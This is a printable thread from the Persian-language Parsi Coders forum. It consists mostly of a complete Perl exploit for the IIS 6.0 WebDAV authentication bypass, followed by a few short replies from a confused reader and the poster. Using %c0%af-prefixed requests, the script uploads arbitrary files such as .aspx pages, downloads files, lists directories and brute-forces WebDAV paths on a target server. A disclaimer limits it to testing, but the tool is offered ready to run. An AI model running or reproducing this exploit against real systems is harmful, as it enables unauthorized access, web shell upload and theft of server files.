Parsi Coders
MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl) - نسخه قابل چاپ

+- Parsi Coders (http://parsicoders.com)
+-- انجمن: Security and influence (http://parsicoders.com/forumdisplay.php?fid=59)
+--- انجمن: Influence (http://parsicoders.com/forumdisplay.php?fid=61)
+--- موضوع: MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl) (/showthread.php?tid=1684)



MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl) - Amin_Mansouri - 01-26-2012

کد:
#!/usr/bin/perl
#  ********* !!! WARNING !!! *********
#  *   FOR SECURITY TESTiNG ONLY!    *
#  ***********************************
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  v1.1 add brute force dir fuction.
#  v1.0 download、upload and list dir.
#
#  Usage:
#        IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
#        -target                                eg.: 192.168.1.1
#   -port                                    eg.: 80
#   -method                                eg.: g
#    (p:PUT,g:GET,l:LIST)
#   -webdavpath                        eg.: webdav
#   -BruteForcePath                eg.: brute force webdav path
#   -file    (optional)            eg.: test.aspx
#  Example:
#        put a file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#        get a file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#        list dir:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#        brute force + list dir:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#        brute force + get file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
  
use IO::Socket;
use Getopt::Long;

use threads;
use threads::shared;

# Globals Go Here.
my $target;                # Host being probed.
my $port;                    # Webserver port.
my $method;                # HTTP Method, PUT GET or .

my $xpath;                # WebDAV path on Webserver.
my $bpath;                # Bruteforce WebDAV path.
my $file;                    # file name.
my $httpmethod;
my $Host_Header;    # The Host header has to be changed

GetOptions(
        "target=s"      => \$target,
        "port=i"        => \$port,
        "method=s"      => \$method,
        "xpath=s"       => \$xpath,
        "bpath=s"       => \$bpath,
        "file=s"        => \$file,
        "help|?"        => sub {
                                hello();
                                exit(0);
                           }
);

$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put,get or list method\n" if ((!$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!$bpath));
$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l");

if ($error) {
        print "Try $0 -help or -?' for more information.\n$error\n" ;
        exit;
}

hello();

if ($method eq "p") {
    $httpmethod = "PUT";
} elsif ($method eq "g") {
  $httpmethod = "GET";
} elsif ($method eq "l") {
  $httpmethod = "PROPFIND";
} else {
  print "$method Method not accept !!!\n";
  exit(0);
}
    
# ************************************
# * We testing WebDAV methods first  *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
  $xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."\n";
if ($httpmethod eq "PUT") {
  my $content;
  my $data;
  #cacl file size
  $filesize = -s $file;
  print "$file size is $filesize bytes\n";
  open(INFO, $file) || die("Could not open file!");
  #@lines=<INFO>;
  binmode(INFO); #binary
  while(read(INFO, $data, $filesize))
  {
      $content .= $data;
  }
  close(INFO);
  #print $content;
  
  $Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
} elsif ($httpmethod eq "GET") {
    $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
} elsif ($httpmethod eq "PROPFIND") {
    $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
    $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";

# ************************
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "GET") {
    @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "PROPFIND") {
    @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
}
#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
    $flag="on";
} elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
    $flag="off";
}    

print "-" x 60 ."\n";
if ($flag eq "on") {
  if ($httpmethod eq "PUT") {
      print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
  } elsif ($httpmethod eq "GET") {
    my $line_no = 0;
    my $counter = @results;
    foreach $line (@results){
        ++$line_no;
        if ($line =~ /^Accept-Ranges: bytes\r\n/){
            last;
        }
    }

    # Write file to disk
    open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
    binmode (OUTFILE);
    print OUTFILE @results[$line_no+1..$counter];
    close(OUTFILE);    
    
      print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";      
      
  } elsif ($httpmethod eq "PROPFIND") {
    print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
      foreach $line (@results){
        if ($line =~ /^\<\?xml version\=/i){
            my @list = split("<a:href>", $line);
            foreach $path (@list) {
                $no = index($path,"<");
                $result.=substr($path, 0, $no)."\n";
            }
            print $result;
            last;
        }
    }
  }
} else {
    print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";
}
print "-" x 60 ."\n";
exit(0);

# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
  my ($pstr,$realip,$realport,$timeout)=@_;
  my $target2 = inet_aton($realip);
  my $flagexit=0;
  $SIG{ALRM}=\&ermm;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
  alarm($timeout);
  if (connect(S,pack "SnA4x8",2,$realport,$target2)){
    alarm(0);
    my @in;
    select(S); $|=1;
    print $pstr;
    alarm($timeout);
    while(<S>){
      if ($flagexit == 1){
        close (S);
        print STDOUT "Timeout\n";
        return "Timeout";
      }
      push @in, $_;
    }
    alarm(0);
    select(STDOUT);
    close(S);
    return @in;
  } else {return "0";}
}

sub ermm{
        $flagexit=1;
        close (S);
}

sub webdavtest {
    my ($testip,$testport)=@_;
  print "-" x 60 ."\n";
  print "Testing WebDAV methods [$testip $testport]\n";
  print "-" x 60 ."\n";
  @results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,10);
  if ($#results < 1){die "10s timeout to $target on port $testport\n";}
  #print @results;
  $flag="off";
  foreach $line (@results){
      if ($line =~ /^Server: /){
          ($left,$right)=split(/\:/,$line);
          $right =~ s/ //g;
          print "$target : Server type is : $right";

        if ($right !~ /Microsoft-IIS/i){
            print "$target : Not a Microsoft IIS Server\n";
            exit(0);
        }
      }
    
      if ($line =~ /^DAV: /){
          $flag="on";
      }
    
      if ($line =~ /^Public: / && $flag eq "on"){
        ($left,$right)=split(/\:/,$line);
        $right =~ s/ //g;
        print "$target : Method type is : $right";
        if ($right !~ /$httpmethod/i){
          print "$target : Not allow $httpmethod on this WebDAV Server\n";
          exit(0);
        } else {
          $flag="on";
        }
      }        
  }
  if ($flag eq "off") {
    print "$target : WebDAV disable\n";
    exit(0);    
  }
}

sub webdavbf {
    my ($bfip,$bfport,$bfpath)=@_;
  print "-" x 60 ."\n";
  print "Try to brute forceing WebDAV path ...\n";
  print "-" x 60 ."\n";
  open(BF, $bfpath) || die("Could not open file!");
  foreach $lines (<BF>){
      chomp($lines);

      $Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
      $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
      
      @results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",$bfip,$bfport,10);
    if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";}
    
    print "[$lines]...$results[0]";
    
       #maybe this response
       #HTTP/1.1 207 Multi-Status
    if ($results[0] =~ m|^HTTP/1\.[01] 401 |){
        print "Find out path on [$lines]\n";
        return $lines;
        last;
    }
  }
  close(BF) ;
  print "Sorry... We can not find any more path... :(\n";
  exit(0);
}

sub hello{
  print "\n";
  print "\t ##################################################\n";
  print "\t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #\n";
  print "\t #  **************** !!! WARNING !!! **************#\n";
  print "\t #  **** FOR PRIVATE AND EDUCATIONAL USE ONLY! ****#\n";
  print "\t #  ***********************************************#\n";
  print "\t #  Written by csgcsg 090529                       #\n";
  print "\t ###################################################\n";
  print "\n\t $0 -target -port -method -webdavpath [-file]\n";
  print "\n\t -target\t\t eg.: 192.168.1.1\n";
  print "\t -port\t\t\t eg.: 80\n";
  print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n";
  print "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n";
  print "\t -file\t\t\t eg.: test.aspx\n\n";
  print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n";
};



RE: MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl) - meisam1376 - 01-26-2012

اینا چی هستند که نوشتی.قاطی کردم....


RE: MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl) - Amin_Mansouri - 01-26-2012

یه اکسپولیت برای باگ IIS 6.0 WebDAV Auth


RE: MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl) - meisam1376 - 01-26-2012

اقا من توصیه می کنم به خودم که تو خط این چیزا نرم قاطی تر شدم.اصلا چی میگی من نمی فهمم. ممنون دیگه تو این موضوعات نمیام.


RE: MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1 (perl) - Amin_Mansouri - 01-26-2012

(01-26-2012، 09:02 PM)meisam1376 نوشته: اقا من توصیه می کنم به خودم که تو خط این چیزا نرم قاطی تر شدم.اصلا چی میگی من نمی فهمم. ممنون دیگه تو این موضوعات نمیام.

پیشنهاد میکم اینجا رو ببین
http://parsicoders.com/showthread.php?tid=1658&pid=3473#pid3473